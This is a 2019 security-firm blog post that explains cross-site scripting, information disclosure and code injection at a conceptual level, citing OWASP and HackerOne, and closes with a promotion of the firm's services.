Top 3 Web Application Vulnerabilities Every Organization Should Be Aware of

Aug 28, 2019

Top 3 Web Application Vulnerabilities Every Organization Should Be Aware of Image

In the last five years technology and the architecture of applications that organizations rely heavily upon have changed significantly, leaving areas for vulnerabilities in software that is insecure. Two organizations well-known in the security community for analyzing top risks and security vulnerabilities, OWASP (Open Web Application Security Project) and HackerOne, have outlined three web application vulnerabilities in their top 10 reports.

 

OWASP’s vulnerabilities report analyzes the top ten most critical web application security risks and represents a broad consensus of the most critical security risks that organizations should review to minimize risk in their web applications – and HackerOne has released its first report analyzing their robust database of valid vulnerabilities to assess over 120,000 security weaknesses, that contribute to hackers earning over $55 million in bounties on their platform.

 

In both reports, they included three common web vulnerabilities in their top rankings: cross-site scripting, information disclosure, and code injection.

Web Application Vulnerabilities Explained

Before we dive into the three most common web vulnerabilities, let’s discuss briefly what a web application security risk is. Below is OWASP’s graph depicting the journey of an exploited vulnerability that an attacker has used to gain access to an organization’s environment:

A chart explaining web application and owasp vulnerabilities.A chart explaining web application and owasp vulnerabilities.

Because of the nature of web applications, attackers can easily modify the parameters and execute the functionality of a web application that was not intended to be executed as a function. Security risks can be found in different areas of your organization’s security infrastructure where bad actors will attack and exploit them to impact your business assets and impact your day-to-day operations. Secuvant’s Cyber7™ approach outlines the top seven areas of business risk that can impact your business operations and explains how we determine the overall risk to your organization.

Now let’s discuss the three common web vulnerabilities noted by both OWASP and HackerOne as top security risks.

Web Application Vulnerability #1: Cross-site Scripting

Cross-site scripting, otherwise known as XSS, is the most common vulnerability found in web applications. It’s most often used for impersonating the victim by stealing their session cookies. Hackers exploit this vulnerability by using an organization’s web application to inject a malicious browser side script code to a different end-user. There are three main types of cross-site scripting: Cross-site scripting, otherwise known as XSS, is the most common vulnerability found in web applications. It’s most often used for impersonating the victim by stealing their session cookies. Hackers exploit this vulnerability by using an organization’s web application to inject a malicious browser side script code to a different end-user. There are three main types of cross-site scripting:

  1. Reflected: this type of XSS uses social engineering tactics to lure end-users in making a request to the server to execute the malicious code payload into the user’s browser. This type of XSS is the easiest to exploit and is commonly used in social networks using malicious links. 
  2. Stored: this type of XSS takes malicious content and stores it in a file, database, or back-end system to then later display the data, typically referred to as a “payload,” to the end-user. Content management systems, blogs, or forums are at most risk for this type of XSS. This is because, with these types of applications, there is multiple end-users viewing data input such as blog comments or forum submissions where malicious links can be inserted to affect the other users. 
  3. DOM-based injection: Document Object Model-based XSS attacks occur when the web application writes data to the DOM (document.url, document.location, document.referrer) without proper sanitization, allowing the hacker to inject malicious JavaScript code to the content on the web page. 

The challenge in stopping these attacks is that there are hundreds of variants of them using different types of scripts, making it hard to filter out – but they all come in a form of embedded JavaScript. It’s imperative developers and application managers conduct the consistent analysis of JavaScript applications, in order to minimize the risk imposed on their organization.

Web Application Vulnerability #2: Information Disclosure

The next common web application vulnerability is information disclosure. As the title states, this risk is the disclosure of information to an actor that is not explicitly authorized to have access to that information. Web applications can fail to protect sensitive information that allows hackers to gain access to the information to be able to use it later in an attack – thus an exploitable vulnerability. Examples of information disclosure include:

  • Banner grabbing/active reconnaissance attacks
  • Source code disclosure
  • Filename and path disclosure

Some ways organizations can enhance their information security is by encrypting data such as passwords or credit card data. This makes it so this information is not in plain text, authenticates pages with HTTPS, and secures and authenticates tokens.

A man using a computer with common web vulnerabilities.

Web Application Vulnerability #3: Code Injection

The third web application vulnerability named in the two reports is code injection. This vulnerability is exploited when an attacker injects code that is interpreted and executed by the web application, typically caused by the lack of proper input/output data validation. OWASP has reported the most common example being the SQL query consuming untrusted data.

Protecting Your Web Applications with Secuvant

As application hacking continues to be prevalent in organizations of all sizes for stealing data, distributing malware, and gaining access to an organization’s business assets, it’s important that developers, security testers, organizations, and application managers perform frequent security assessments of their web applications. This testing will help secure and patch vulnerabilities and gaps, as well as update operating systems and servers.

For more information on how Secuvant can help your organization identify vulnerabilities in your systems and perform 24/7 managed detection and response services to catch bad actors before they disrupt your business, reach out to our security professionals at contactus@secuvant.com or 855-732-8826. We know how important your data is and we can help you take the necessary steps to ensure your business and assets are safe and secure from outside threats.